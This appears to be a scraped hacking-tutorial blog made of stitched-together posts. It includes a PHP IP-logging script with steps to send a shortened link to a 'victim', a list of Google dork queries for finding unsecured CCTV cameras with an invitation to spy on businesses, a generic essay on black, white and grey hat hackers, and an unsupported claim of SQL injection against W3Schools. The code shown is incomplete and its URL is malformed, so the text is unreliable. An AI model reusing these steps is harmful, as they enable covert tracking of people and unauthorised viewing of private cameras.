ok .. so after long time my new post is on! way to get ip address of your friend computer from Facebook or other chat services like Gtalk,yahoo,Skype etc…
ohhh .. i know you are thinking that how this possible … but anything is possible in term of computer … but to do something you need a mind 😛 ..
ok leave it .. now i will show you real trick ..
Follow me …. 😉
Step1:- First signup on free hosting site like my3gb, x10Hosting etc…
Step2:- now open text editor in your system and copy paste the following code and save it with .php extension …
$ip = $_SERVER[‘REMOTE_ADDR’];
$dt = date(“l dS \of F Y h:i:s A”);
$data = $ip.’ ‘.$dt.”\n”;
header( ‘Location: https://https://smarthacker5.wordpress.com’) ;
ohhh .. now you thinking that, what this code does do .. nothing just grabbing the ip of your victim ..
Step3:- now copy the file url and shorten it with the Services like “bitly” or etc …
Step4:- Send the link which you get to your victim .. and just wait to open it ..
Step5:- now go back and see the ip_address.txt . to get ip…
yup .. so finally you got the ip address … but now what you do with it …
nothing just trace it or exploit it with backtrack …
🙂 happy hacking 🙂
note:- in case if ip_address.txt was no created automatically .. than create it manually and then try again …
Everyone has heard of one individual or another that was caught while hacking computers that belonged to this or that organization. Because hacking into computers is highly illegal, it should be mentioned that this article will not mention any real specifics about the subject, and this author would rather gladly encourage you to become a real hacker – professionally.
This article, will however, give a brief overview of criminal hackers, some of their methods, and a few things you can do to make your own computer safer from hack attacks. Here are those things you need to learn on how to become a hacker.
It should go without saying that the first thing that is needed is to learn about computers. This means study. A lot of reading is involved along with just plain old-fashioned learning how to use a computer. Then, of course, there are the special aspects of computer study. The places where the tips are learned is often two-fold: a friend who has access to a computer, and a variety of places on the Web. But this is also an interesting thing – if a young person has the ability to learn, and wants to learn can use hacking tutorials- then why not take the time to learn the right things – things that can earn him a lot of money in the legit world? Is it possibly that it could be the friend he has that turns him away from the good?
Learn The Websites
Special hacker Web sites, where hackers congregate, exist on the Web – as does every other known group of people – whether legal or illegal. Some of these are known to be hacker chat rooms, hacker forum, and regular hacker sites.
Learn The Secrets
It is in these Web sites, and possibly some of the people that he may meet, maybe only online, where he will learn the hacking basics, and learn how to hack.
What is Hacker ?
– The hacker is Person like you/me Who try to Gain Unauthorized access in any System using Some Program’s and Software.
ok…i think you all understand what is hacker.. for clear and good definition Google is better. ok …leave it lets start types of hacker…
* Some time when some one ask you types of hacker than..all one you/me say Ethical hacker, System hacker..etc. but in real world hacker has a three types..
Grey Hat Hackers
A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.
For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.
If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.
Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.
White Hat Hacker
According to Hollywood, a hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.
In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.
Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.
When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.
Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activ ities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.
On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, linux, a PC and an internet connection is all you need.
Black Hat Hackers
Thanks to Hollywood, black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let’s learn about black hat techniques and how they make our lives a little more difficult.
What Is Black Hat Hacking?
A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transferences to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.
Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10’000,000 to Citigroup.
Differences Between White Hat And A Black Hat Hacker
The difference between black hat and white hat hackers is that white hat hacker uses their skills and knowledge as a way to defend someone from attackers. That means that white hat hackers offer their services to corporations, public organizations and educational institutions.
These services include a complete revision of their computer network security, implementation of new security systems (they may be hardware or software), user training and future recommendations. All these measures will be able to combat unauthorized hacking; black hat hackers, however, will continue trying.
Ever wanted to spy on a business? A workplace, or a town? Or your just totally bored and got nothing else to do and want to fuck about with some CCTV!?! Well this tut is for you! You can hack into the cameras and control them too! What I am about to tell you is Google Hacking. No its not the type of hacking you may know or hear of, but it is STILL hacking. So be warned. Use this tut at your own risk.
Step 1: Go to Google! http://www.google.com
Step 2: Enter one of the following lines: (Note, Do not enter the whole lot, that won’t work!)
* intitle:”Live View / – AXIS
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* intitle:”live view” intitle:axis
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”
Step 3: Find a website like this: http://184.108.40.206/CgiStart?page=Single&Language=0
Step 4: Open an link from that…and enjoy the hack… for further hack we need tools ..we show nest time…
Yesterday. i found Vulnerability in Most Famous Site http://www.W3Schools.com Is Vulnerable for SQL injection.. i test it and Successfully Get Admin ID and Pass.. i Don’t Share it here because Security reason…
if you know hoe to use and hack..than don’t missus it…
13 years old, is a Ethical Hacker ,Writer, Cyber Security Consultant
with definitive experience in the field of Internet security based out
in Ahmedabad in India. He is writing a book named “Ethical Hacking the
forbidden guide” , which contains stuff on hacking and
security. This book will surely open the eyes of all the people around
the world,whether its the CEO of a company ,Government official and
even the common man and will learn how to protect his computer from the
cyber world. He is currently the writer of the magazine “Hackers5“.And of
his articles have also come up in the news paper. Divya Ranjan has
helped many companies by finding vulnerabilities in their server and
then helping them to patch them.
Vulnerability found by Divya are….